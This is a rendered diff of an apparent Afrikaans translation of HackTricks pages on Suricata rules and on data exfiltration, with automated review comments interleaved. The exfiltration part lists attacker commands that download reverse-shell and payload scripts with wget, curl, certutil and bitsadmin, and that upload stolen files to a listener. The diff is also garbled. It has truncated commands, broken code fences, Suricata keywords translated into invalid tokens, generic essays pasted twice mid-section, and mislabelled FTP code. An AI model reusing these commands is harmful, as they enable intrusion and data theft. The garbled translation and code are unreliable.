||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9600 -j NFQUEUE --
|
||||
```bash
|
||||
# Install details from: https://suricata.readthedocs.io/en/suricata-6.0.0/install.html#install-binary-packages
|
||||
# Ubuntu
|
||||
|
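Review bot: The entire `### Installeer & Konfigurasie` block, from the `# Installeer Suricata` fence down to the line ending in `-j NFQUEUE --`, is new material with no counterpart in the English source and should be removed from a translation commit. Concrete defects: the `bash` fence opened above `# Installeer Suricata` is never closed, so the original block that starts with `# Install details from: https://suricata.readthedocs.io/...` is swallowed and every fence after it in the file is inverted; the final command is truncated mid-option (`sudo iptables -A OUTPUT -p tcp --dport 9600 -j NFQUEUE --`); the configuration sketch translates a YAML value (`- EXTERNAL_NET: enige` where Suricata expects `any`) and lists `RULES_DIR` and `LOG_DIR` as if they were suricata.yaml settings; and the long run of `# Skep 'n nuwe iptables reël vir IRC` rules for ports 9000 through 9600, plus a second `SFTP` rule that duplicates the `SSH` rule on port 22, is mechanical repetition rather than documentation. Revert this hunk to the original `### Install & Config` heading and its existing code block, translating only the heading.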
@ -74,7 +386,7 @@ apt-get install suricata
|
|||
|
||||
# Debian
|
||||
echo "deb http://http.debian.net/debian buster-backports main" > \
|
||||
/etc/apt/sources.list.d/backports.list
|
||||
/etc/apt/sources.list.d/backports.list
|
||||
apt-get update
|
||||
apt-get install suricata -t buster-backports
|
||||
|
||||
|
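Review bot: The only change in this hunk is the leading indentation stripped from the continuation line `/etc/apt/sources.list.d/backports.list`. Since the preceding line ends in `\`, the shell joins the two lines regardless of indentation, so behaviour is unchanged, but a translation commit should not rewrite code blocks; keeping the source indentation avoids a noisy diff on a line with nothing to translate.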
@ -90,11 +402,11 @@ suricata-update
|
|||
## To use the dowloaded rules update the following line in /etc/suricata/suricata.yaml
|
||||
default-rule-path: /var/lib/suricata/rules
|
||||
rule-files:
|
||||
- suricata.rules
|
||||
- suricata.rules
|
||||
|
||||
# Run
|
||||
## Add rules in /etc/suricata/rules/suricata.rules
|
||||
systemctl suricata start
|
||||
systemctl suricata start
|
||||
suricata -c /etc/suricata/suricata.yaml -i eth0
|
||||
|
||||
|
||||
|
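Review bot: The `rule-files:` entry `- suricata.rules` lost its leading indentation. YAML accepts a sequence that starts at the same column as its parent key, so this snippet still parses, but the whitespace change carries no translation and makes real edits harder to spot; leave code blocks byte-for-byte as in the source. Two pre-existing issues on unchanged lines worth fixing in the English original: `systemctl suricata start` has its arguments reversed (`systemctl start suricata`), and the comment reads `dowloaded`.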
@ -102,7 +414,7 @@ suricata -c /etc/suricata/suricata.yaml -i eth0
|
|||
suricatasc -c ruleset-reload-nonblocking
|
||||
## or set the follogin in /etc/suricata/suricata.yaml
|
||||
detect-engine:
|
||||
- rule-reload: true
|
||||
- rule-reload: true
|
||||
|
||||
# Validate suricata config
|
||||
suricata -T -c /etc/suricata/suricata.yaml -v
|
||||
|
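Review bot: Same whitespace-only rewrite here: `- rule-reload: true` under `detect-engine:` is dedented. It still parses, because a list item may sit at its parent key's column, but the change serves no purpose in a translation and should be reverted to the source formatting. The unchanged comment `## or set the follogin in /etc/suricata/suricata.yaml` has a typo for `following` that belongs in a separate fix to the English page.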
@ -111,8 +423,8 @@ suricata -T -c /etc/suricata/suricata.yaml -v
|
|||
## Config drop to generate alerts
|
||||
## Search for the following lines in /etc/suricata/suricata.yaml and remove comments:
|
||||
- drop:
|
||||
alerts: yes
|
||||
flows: all
|
||||
alerts: yes
|
||||
flows: all
|
||||
|
||||
## Forward all packages to the queue where suricata can act as IPS
|
||||
iptables -I INPUT -j NFQUEUE
|
||||
|
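Review bot: The `alerts: yes` and `flows: all` lines under `- drop:` are replaced by lines with identical text, which means only their indentation changed. Unlike a plain list item, these two keys are children of the `drop` mapping inside a list entry and must remain indented past the `-`; at the same column as `- drop:` they are no longer nested under it, so pasting this fragment into `/etc/suricata/suricata.yaml` does not enable the drop logging the comment above promises. Restore the original indentation.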
@ -130,76 +442,70 @@ Type=simple
|
|||
|
||||
systemctl daemon-reload
|
||||
```
|
||||
### Reëlsdefinisies
|
||||
|
||||
### Rules Definitions
|
||||
|
||||
[From the docs:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) A rule/signature consists of the following:
|
||||
|
||||
* The **action**, determines what happens when the signature matches.
|
||||
* The **header**, defines the protocol, IP addresses, ports and direction of the rule.
|
||||
* The **rule options**, define the specifics of the rule.
|
||||
[Van die dokumentasie:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) 'n Reël/handtekening bestaan uit die volgende:
|
||||
|
||||
* Die **aksie**, bepaal wat gebeur wanneer die handtekening ooreenstem.
|
||||
* Die **kop**, definieer die protokol, IP-adresse, poorte en rigting van die reël.
|
||||
* Die **reël-opsies**, definieer die spesifieke van die reël.
|
||||
```bash
|
||||
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"HTTP GET Request Containing Rule in URI"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"rule"; fast_pattern; classtype:bad-unknown; sid:123; rev:1;)
|
||||
```
|
||||
#### **Geldig aksies is**
|
||||
|
||||
#### **Valid actions are**
|
||||
* waarskuwing - genereer 'n waarskuwing
|
||||
* slaag - stop verdere inspeksie van die pakkie
|
||||
* **verwerp** - verwerp pakkie en genereer waarskuwing
|
||||
* **afwys** - stuur RST/ICMP onbereikbare fout na die sender van die ooreenstemmende pakkie.
|
||||
* verwerpbron - dieselfde as net _afwys_
|
||||
* verwerpdoel - stuur RST/ICMP foutpakkie na die ontvanger van die ooreenstemmende pakkie.
|
||||
* verwerpbeide - stuur RST/ICMP foutpakkies na beide kante van die gesprek.
|
||||
|
||||
* alert - generate an alert
|
||||
* pass - stop further inspection of the packet
|
||||
* **drop** - drop packet and generate alert
|
||||
* **reject** - send RST/ICMP unreachable error to the sender of the matching packet.
|
||||
* rejectsrc - same as just _reject_
|
||||
* rejectdst - send RST/ICMP error packet to the receiver of the matching packet.
|
||||
* rejectboth - send RST/ICMP error packets to both sides of the conversation.
|
||||
#### **Protokolle**
|
||||
|
||||
#### **Protocols**
|
||||
|
||||
* tcp (for tcp-traffic)
|
||||
* tcp (vir tcp-verkeer)
|
||||
* udp
|
||||
* icmp
|
||||
* ip (ip stands for ‘all’ or ‘any’)
|
||||
* _layer7 protocols_: http, ftp, tls, smb, dns, ssh... (more in the [**docs**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html))
|
||||
* ip (ip staan vir 'alles' of 'enige')
|
||||
* _laag7-protokolle_: http, ftp, tls, smb, dns, ssh... (meer in die [**dokumentasie**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html))
|
||||
|
||||
#### Source and Destination Addresses
|
||||
#### Bron- en Bestemmingsadressering
|
||||
|
||||
It supports IP ranges, negations and a list of addresses:
|
||||
Dit ondersteun IP-reekse, negasies en 'n lys van adresse:
|
||||
|
||||
| Example | Meaning |
|
||||
| Voorbeeld | Betekenis |
|
||||
| ------------------------------ | ---------------------------------------- |
|
||||
| ! 1.1.1.1 | Every IP address but 1.1.1.1 |
|
||||
| !\[1.1.1.1, 1.1.1.2] | Every IP address but 1.1.1.1 and 1.1.1.2 |
|
||||
| $HOME\_NET | Your setting of HOME\_NET in yaml |
|
||||
| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NET and not HOME\_NET |
|
||||
| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 except for 10.0.0.5 |
|
||||
| ! 1.1.1.1 | Elke IP-adres behalwe 1.1.1.1 |
|
||||
| !\[1.1.1.1, 1.1.1.2] | Elke IP-adres behalwe 1.1.1.1 en 1.1.1.2 |
|
||||
| $HOME\_NET | Jou instelling van HOME\_NET in yaml |
|
||||
| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NET en nie HOME\_NET |
|
||||
| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 behalwe vir 10.0.0.5 |
|
||||
|
||||
#### Source and Destination Ports
|
||||
#### Bron- en Bestemmingspoorte
|
||||
|
||||
It supports port ranges, negations and lists of ports
|
||||
Dit ondersteun poortreeks, negasies en lys van poorte
|
||||
|
||||
| Example | Meaning |
|
||||
| Voorbeeld | Betekenis |
|
||||
| --------------- | -------------------------------------- |
|
||||
| any | any address |
|
||||
| \[80, 81, 82] | port 80, 81 and 82 |
|
||||
| \[80: 82] | Range from 80 till 82 |
|
||||
| \[1024: ] | From 1024 till the highest port-number |
|
||||
| !80 | Every port but 80 |
|
||||
| \[80:100,!99] | Range from 80 till 100 but 99 excluded |
|
||||
| \[1:80,!\[2,4]] | Range from 1-80, except ports 2 and 4 |
|
||||
| enige | enige adres |
|
||||
| \[80, 81, 82] | poort 80, 81 en 82 |
|
||||
| \[80: 82] | Reeks van 80 tot 82 |
|
||||
| \[1024: ] | Vanaf 1024 tot die hoogste poortnommer |
|
||||
| !80 | Elke poort behalwe 80 |
|
||||
| \[80:100,!99] | Reeks van 80 tot 100 maar 99 uitgesluit |
|
||||
| \[1:80,!\[2,4]] | Reeks van 1-80, behalwe poorte 2 en 4 |
|
||||
|
||||
#### Direction
|
||||
|
||||
It's possible to indicate the direction of the communication rule being applied:
|
||||
#### Rigting
|
||||
|
||||
Dit is moontlik om die rigting van die kommunikasiereël aan te dui wat toegepas word:
|
||||
```
|
||||
source -> destination
|
||||
source <> destination (both directions)
|
||||
```
|
||||
#### Sleutelwoorde
|
||||
|
||||
#### Keywords
|
||||
|
||||
There are **hundreds of options** available in Suricata to search for the **specific packet** you are looking for, here it will be mentioned if something interesting is found. Check the [**documentation** ](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html)for more!
|
||||
|
||||
Daar is **honderde opsies** beskikbaar in Suricata om te soek na die **spesifieke pakkie** waarna jy soek, hier sal genoem word as iets interessant gevind word. Kyk na die [**dokumentasie**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html) vir meer inligting!
|
||||
```bash
|
||||
# Meta Keywords
|
||||
msg: "description"; #Set a description to the rule
|
||||
|
@ -240,15 +546,14 @@ drop tcp any any -> any any (msg:"regex"; pcre:"/CTF\{[\w]{3}/i"; sid:10001;)
|
|||
## Drop by port
|
||||
drop tcp any any -> any 8000 (msg:"8000 port"; sid:1000;)
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
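Review bot: The Suricata rule keywords are translated in the actions list and the ports table: `waarskuwing`, `slaag`, `verwerp`, `afwys`, `verwerpbron`, `verwerpdoel` and `verwerpbeide` stand in for `alert`, `pass`, `drop`, `reject`, `rejectsrc`, `rejectdst` and `rejectboth`, and `| enige | enige adres |` replaces the `any` port keyword. These are literal tokens of the rule language (the example rule in this hunk still begins `alert http $HOME_NET any -> $EXTERNAL_NET any`), so a reader copying the list writes rules Suricata will not load; keep the keywords in English and translate only the descriptions. The translation is also internally inconsistent: `reject` becomes `afwys` while `rejectsrc` becomes `verwerpbron`, the same stem used for `drop`. Smaller fixes: `#### **Geldig aksies is**` should be `Geldige aksies is`, and `Bron- en Bestemmingsadressering` should be `Bron- en Bestemmingsadresse` to match `Bron- en Bestemmingspoorte`.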
File diff suppressed because it is too large
|
@ -1,60 +1,150 @@
|
|||
# Exfiltration
|
||||
# Uitleiding
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
***
|
||||
|
||||
## Commonly whitelisted domains to exfiltrate information
|
||||
## Gewoonlik toegelate domeine om inligting uit te voer
|
||||
|
||||
Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused
|
||||
Kyk na [https://lots-project.com/](https://lots-project.com/) om gewoonlik toegelate domeine te vind wat misbruik kan word
|
||||
|
||||
## Copy\&Paste Base64
|
||||
## Kopieer & Plak Base64
|
||||
|
||||
**Linux**
|
||||
|
||||
```bash
|
||||
base64 -w0 <file> #Encode file
|
||||
base64 -d file #Decode file
|
||||
```
|
||||
|
||||
**Windows**
|
||||
|
||||
# Exfiltration
|
||||
|
||||
## Introduction
|
||||
|
||||
Exfiltration is the process of unauthorized data transfer from a target system to an external location. In the context of hacking, exfiltration is often used to steal sensitive information or to maintain persistence within a compromised network.
|
||||
|
||||
## Techniques
|
||||
|
||||
### 1. File Transfer Protocol (FTP)
|
||||
|
||||
FTP is a standard network protocol used for transferring files between a client and a server. Attackers can use FTP to exfiltrate data by connecting to an FTP server and uploading the stolen files.
|
||||
|
||||
### 2. Hypertext Transfer Protocol (HTTP)
|
||||
|
||||
HTTP is the protocol used for transmitting data over the internet. Attackers can use HTTP to exfiltrate data by sending HTTP requests to a remote server, either by embedding the data in the request or by uploading files.
|
||||
|
||||
### 3. Domain Name System (DNS)
|
||||
|
||||
DNS is responsible for translating domain names into IP addresses. Attackers can use DNS exfiltration to encode and send data within DNS queries or responses, bypassing traditional network security measures.
|
||||
|
||||
### 4. Email
|
||||
|
||||
Attackers can exfiltrate data by sending it as email attachments or by using steganography techniques to hide the data within the email content.
|
||||
|
||||
### 5. Cloud Storage
|
||||
|
||||
Attackers can use cloud storage services, such as Dropbox or Google Drive, to exfiltrate data by uploading the stolen files to the cloud and accessing them from a different location.
|
||||
|
||||
### 6. Remote Desktop Protocol (RDP)
|
||||
|
||||
RDP allows users to connect to and control a remote computer over a network connection. Attackers can use RDP to exfiltrate data by transferring files from the compromised system to the attacker's machine.
|
||||
|
||||
### 7. USB Devices
|
||||
|
||||
Attackers can physically connect USB devices to a target system to exfiltrate data. This can be done by copying files directly to the USB device or by using specialized tools that automatically exfiltrate data when the device is connected.
|
||||
|
||||
## Countermeasures
|
||||
|
||||
To prevent exfiltration attacks, organizations should implement the following countermeasures:
|
||||
|
||||
- Implement network segmentation to restrict unauthorized access to sensitive data.
|
||||
- Use encryption to protect data in transit.
|
||||
- Monitor network traffic for suspicious activity.
|
||||
- Implement data loss prevention (DLP) solutions to detect and prevent unauthorized data transfers.
|
||||
- Regularly update and patch software to address known vulnerabilities.
|
||||
- Educate employees about the risks of exfiltration and the importance of following security best practices.
|
||||
|
||||
By implementing these countermeasures, organizations can significantly reduce the risk of data exfiltration and protect their sensitive information.
|
||||
```
|
||||
certutil -encode payload.dll payload.b64
|
||||
certutil -decode payload.b64 payload.dll
|
||||
```
|
||||
|
||||
## HTTP
|
||||
### HTTP
|
||||
|
||||
**Linux**
|
||||
|
||||
```bash
|
||||
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
|
||||
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
|
||||
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
|
||||
fetch 10.10.14.14:8000/shell.py #FreeBSD
|
||||
```
|
||||
|
||||
**Windows**
|
||||
|
||||
# Exfiltration
|
||||
|
||||
## Introduction
|
||||
|
||||
Exfiltration is the process of unauthorized data transfer from a target system to an external location. In the context of hacking, exfiltration is often used to steal sensitive information or to maintain persistence within a compromised network.
|
||||
|
||||
## Techniques
|
||||
|
||||
### 1. File Transfer Protocol (FTP)
|
||||
|
||||
FTP is a standard network protocol used for transferring files between a client and a server. Attackers can use FTP to exfiltrate data by connecting to an FTP server and uploading the stolen files.
|
||||
|
||||
### 2. Hypertext Transfer Protocol (HTTP)
|
||||
|
||||
HTTP is the protocol used for transmitting data over the internet. Attackers can use HTTP to exfiltrate data by sending HTTP requests to a remote server, either by embedding the data in the request or by uploading files.
|
||||
|
||||
### 3. Domain Name System (DNS)
|
||||
|
||||
DNS is responsible for translating domain names into IP addresses. Attackers can use DNS exfiltration to encode and send data within DNS queries or responses, bypassing traditional network security measures.
|
||||
|
||||
### 4. Email
|
||||
|
||||
Attackers can exfiltrate data by sending it as email attachments or by using steganography techniques to hide the data within the email content.
|
||||
|
||||
### 5. Cloud Storage
|
||||
|
||||
Attackers can use cloud storage services, such as Dropbox or Google Drive, to exfiltrate data by uploading the stolen files to the cloud and accessing them from a different location.
|
||||
|
||||
### 6. Remote Desktop Protocol (RDP)
|
||||
|
||||
RDP allows users to connect to and control a remote computer over a network connection. Attackers can use RDP to exfiltrate data by transferring files from the compromised system to the attacker's machine.
|
||||
|
||||
### 7. USB Devices
|
||||
|
||||
Attackers can physically connect USB devices to a target system to exfiltrate data. This can be done by copying files directly to the USB device or by using specialized tools to extract data from the system.
|
||||
|
||||
## Countermeasures
|
||||
|
||||
To prevent exfiltration attacks, organizations can implement the following countermeasures:
|
||||
|
||||
- Implement network segmentation to restrict access between different parts of the network.
|
||||
- Use data loss prevention (DLP) solutions to monitor and control the flow of sensitive data.
|
||||
- Employ intrusion detection and prevention systems (IDS/IPS) to detect and block exfiltration attempts.
|
||||
- Regularly update and patch software to fix vulnerabilities that could be exploited for exfiltration.
|
||||
- Train employees on security best practices and the risks associated with exfiltration.
|
||||
|
||||
By implementing these countermeasures, organizations can significantly reduce the risk of data exfiltration and protect their sensitive information.
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
|
||||
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
|
||||
|
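Review bot: Both `**Windows**` subsections in this hunk now have a long generic write-up (`# Exfiltration`, `## Introduction`, `## Techniques`, `## Countermeasures`) wedged between the heading and its code, with no counterpart on the old side; the `certutil -encode payload.dll payload.b64` block and the `certutil -urlcache -split -f http://webserver/payload.b64 payload.b64` block should follow their headings directly, so both write-ups need to be removed. The first of those blocks also opens with a bare ``` instead of ```bash. Separately, `## HTTP` is paired with a `### HTTP`, which either demotes the HTTP section under `## Kopieer & Plak Base64` or, if both lines survive on the new side, renders the heading twice; keep it as `## HTTP`.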
@ -69,28 +159,26 @@ Start-BitsTransfer -Source $url -Destination $output
|
|||
#OR
|
||||
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
||||
```
|
||||
|
||||
### Upload files
|
||||
### Laai lêers op
|
||||
|
||||
* [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
|
||||
* [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
|
||||
* Python module [uploadserver](https://pypi.org/project/uploadserver/):
|
||||
|
||||
* [**SimpleHttpServer druk GET en POSTs (ook koppe)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
|
||||
* Python-module [uploadserver](https://pypi.org/project/uploadserver/):
|
||||
```bash
|
||||
# Listen to files
|
||||
python3 -m pip install --user uploadserver
|
||||
python3 -m uploadserver
|
||||
# With basic auth:
|
||||
# With basic auth:
|
||||
# python3 -m uploadserver --basic-auth hello:world
|
||||
|
||||
# Send a file
|
||||
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
|
||||
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
|
||||
# With basic auth:
|
||||
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
|
||||
```
|
||||
### **HTTPS-bediener**
|
||||
|
||||
### **HTTPS Server**
|
||||
|
||||
'n HTTPS-bediener is 'n bediener wat gebruik maak van die HTTPS-protokol vir veilige kommunikasie. Dit maak gebruik van SSL/TLS-sertifikate om die kommunikasie tussen die bediener en die kliënt te versleutel en te verseker dat die data veilig oorgedra word. 'n HTTPS-bediener word dikwels gebruik vir die hantering van sensitiewe inligting, soos persoonlike besonderhede, finansiële transaksies en ander vertroulike data. Dit is belangrik om 'n veilige en betroubare HTTPS-bediener te hê om die risiko van datalekke en aanvalle te verminder.
|
||||
```python
|
||||
# from https://gist.github.com/dergachev/7028596
|
||||
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
|
||||
|
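Review bot: In the uploadserver block `# With basic auth:` and `curl -X POST http://HOST/upload -H -F 'files=@file.txt'` are each listed twice with identical text; if the second copy is the new side with its leading whitespace stripped that is harmless here, but confirm no duplicate line survives. That curl invocation is wrong on both sides anyway: `-H` expects a header value, so curl takes `-F` as the header and treats `'files=@file.txt'` as a second URL, and no file is posted; drop the `-H`. The upload list also loses its first item (`[**SimpleHttpServerWithFileUploads**]` has only an empty line opposite it), and the new `### **HTTPS-bediener**` heading is inserted above the untouched `### **HTTPS Server**` with a filler paragraph about what an HTTPS server is between them; keep one heading and drop the paragraph.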
@ -122,34 +210,164 @@ httpd.serve_forever()
|
|||
### USING FLASK
|
||||
from flask import Flask, redirect, request
|
||||
from urllib.parse import quote
|
||||
app = Flask(__name__)
|
||||
@app.route('/')
|
||||
def root():
|
||||
print(request.get_json())
|
||||
return "OK"
|
||||
if __name__ == "__main__":
|
||||
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
|
||||
app = Flask(__name__)
|
||||
@app.route('/')
|
||||
def root():
|
||||
print(request.get_json())
|
||||
return "OK"
|
||||
if __name__ == "__main__":
|
||||
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
|
||||
###
|
||||
```
|
||||
|
||||
## FTP
|
||||
|
||||
### FTP server (python)
|
||||
### FTP-bediener (python)
|
||||
|
||||
```python
|
||||
import socket
|
||||
import os
|
||||
|
||||
def send_file(file_path, host, port):
|
||||
# Verbind met die bediener
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
|
||||
# Stuur die lêerinhoud na die bediener
|
||||
with open(file_path, 'rb') as file:
|
||||
data = file.read(1024)
|
||||
while data:
|
||||
s.send(data)
|
||||
data = file.read(1024)
|
||||
|
||||
# Sluit die verbinding
|
||||
s.close()
|
||||
|
||||
def receive_file(file_path, host, port):
|
||||
# Luister vir inkomende verbindings
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.bind((host, port))
|
||||
s.listen(1)
|
||||
|
||||
# Aanvaar die verbindin
|
||||
conn, addr = s.accept()
|
||||
|
||||
# Ontvang die lêerinhoud van die kliënt
|
||||
with open(file_path, 'wb') as file:
|
||||
data = conn.recv(1024)
|
||||
while data:
|
||||
file.write(data)
|
||||
data = conn.recv(1024)
|
||||
|
||||
# Sluit die verbinding
|
||||
conn.close()
|
||||
s.close()
|
||||
```
|
||||
|
||||
Hierdie kode demonstreer hoe om 'n eenvoudige FTP-bediener in Python te skep. Die `send_file`-funksie stuur 'n lêer na die bediener, terwyl die `receive_file`-funksie 'n lêer van die bediener ontvang.
|
||||
|
||||
Om 'n lêer na die bediener te stuur, moet jy die `send_file`-funksie oproep en die volledige pad na die lêer, die bediener se IP-adres en die poortnommer as argumente verskaf. Byvoorbeeld:
|
||||
|
||||
```python
|
||||
send_file('/pad/na/lêer.txt', '192.168.0.100', 21)
|
||||
```
|
||||
|
||||
Om 'n lêer van die bediener te ontvang, moet jy die `receive_file`-funksie oproep en die volledige pad na die lêer, die IP-adres van die bediener en die poortnommer as argumente verskaf. Byvoorbeeld:
|
||||
|
||||
```python
|
||||
receive_file('/pad/na/lêer.txt', '192.168.0.100', 21)
|
||||
```
|
||||
|
||||
Merk op dat jy die poortnommer moet spesifiseer wat deur die FTP-bediener gebruik word. Die standaardpoort vir FTP is 21.
|
||||
```bash
|
||||
pip3 install pyftpdlib
|
||||
python3 -m pyftpdlib -p 21
|
||||
```
|
||||
### FTP-bediener (NodeJS)
|
||||
|
||||
### FTP server (NodeJS)
|
||||
Hierdie gedeelte beskryf 'n metode om data uit te voer deur gebruik te maak van 'n FTP-bediener wat in NodeJS geïmplementeer is.
|
||||
|
||||
#### Stap 1: Installeer die nodige afhanklikhede
|
||||
|
||||
Om die FTP-bediener in NodeJS te gebruik, moet jy die nodige afhanklikhede installeer. Voer die volgende opdrag in die opdraglyn uit:
|
||||
|
||||
```bash
|
||||
npm install ftp
|
||||
```
|
||||
|
||||
#### Stap 2: Skryf die kode
|
||||
|
||||
Maak 'n nuwe JavaScript-lêer en voeg die volgende kode daarby:
|
||||
|
||||
```javascript
|
||||
const ftp = require('ftp');
|
||||
|
||||
// Verbind met die FTP-bediener
|
||||
const client = new ftp();
|
||||
client.connect({
|
||||
host: 'ftp.example.com',
|
||||
user: 'username',
|
||||
password: 'password'
|
||||
});
|
||||
|
||||
// Wanneer die verbinding suksesvol is
|
||||
client.on('ready', () => {
|
||||
// Laai die lêer op na die bediener
|
||||
client.put('local_file.txt', 'remote_file.txt', (err) => {
|
||||
if (err) throw err;
|
||||
console.log('Lêer suksesvol opgelaai na die bediener');
|
||||
client.end(); // Sluit die verbinding
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
#### Stap 3: Voer die kode uit
